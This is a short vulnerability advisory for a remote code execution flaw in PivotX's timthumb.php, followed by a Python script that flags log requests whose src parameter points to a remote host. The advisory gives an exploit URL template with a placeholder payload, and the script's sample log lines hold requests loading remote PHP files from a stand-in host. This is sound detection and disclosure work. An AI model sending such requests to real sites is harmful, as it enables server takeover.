PivotX TimThumb Remote Code Execution Vulnerability

[o] PivotX <= Remote Code Execution Vulnerability

Software : PivotX ver 2.2.6
Vendor : http://pivotx.net/
Original Author : MaXe [ http://www.exploit-db.com/exploits/17602/ ]



[o] Vulnerability

pivotx/includes/timthumb.php



[o] Exploit

http://localhost/pivotx/includes/timthumb.php?src=[RCE]



[o] Fix

Upgrade to new version (2.3.0)
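
One way to review web server access logs for requests to the script named above whose `src` parameter points at another host. This is an added example, not part of the original advisory; the log format, the sample lines, the host names and the function name `remote_src_hits` are assumptions made for illustration.

```python
import re
from urllib.parse import parse_qs, urlsplit

# Script path from the advisory, matched at the end of the request path.
TIMTHUMB_PATH = "/pivotx/includes/timthumb.php"

# Assumption: Apache/nginx common or combined log format.
REQUEST_RE = re.compile(
    r'^(?P<ip>\S+) .*?"[A-Z]+ (?P<target>\S+) HTTP/[\d.]+" (?P<status>\d{3})'
)

# Constructed sample lines (documentation IP ranges and example hosts).
SAMPLE_LOG = [
    '192.0.2.10 - - [01/Jan/2012:10:00:00 +0000] "GET /pivotx/includes/timthumb.php?src=images/photo.jpg&w=100 HTTP/1.1" 200 5120',
    '198.51.100.7 - - [01/Jan/2012:10:05:00 +0000] "GET /pivotx/includes/timthumb.php?src=http://files.example.net/a.php HTTP/1.1" 200 312',
    '198.51.100.7 - - [01/Jan/2012:10:05:09 +0000] "GET /pivotx/includes/timthumb.php?src=http%3A%2F%2Ffiles.example.net%2Fb.php HTTP/1.1" 400 0',
    '203.0.113.4 - - [01/Jan/2012:10:06:00 +0000] "GET /pivotx/includes/timthumb.php?src=http://blog.example.org/pic.png HTTP/1.1" 200 900',
    '203.0.113.4 - - [01/Jan/2012:10:07:00 +0000] "GET /index.php?src=http://files.example.net/a.php HTTP/1.1" 200 900',
]


def remote_src_hits(lines, own_hosts=()):
    """Return (client_ip, status, src) for timthumb.php requests whose src
    parameter is an absolute URL on a host not listed in own_hosts."""
    own = {h.lower() for h in own_hosts}
    hits = []
    for line in lines:
        m = REQUEST_RE.match(line)
        if not m:
            continue
        target = urlsplit(m.group("target"))
        if not target.path.lower().endswith(TIMTHUMB_PATH):
            continue
        # parse_qs percent-decodes, so an encoded URL in src is caught too.
        for src in parse_qs(target.query).get("src", []):
            try:
                host = urlsplit(src.strip()).hostname
            except ValueError:  # malformed URL in src: keep it for review
                host = "?"
            if host and host.lower() not in own:
                hits.append((m.group("ip"), int(m.group("status")), src))
    return hits


if __name__ == "__main__":
    for ip, status, src in remote_src_hits(SAMPLE_LOG, own_hosts=("blog.example.org",)):
        print(f"{ip} status={status} src={src}")
```

Pass the site's own host names in `own_hosts` so legitimate thumbnails of local images are not reported; hits answered with status 200 are the ones to review first.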
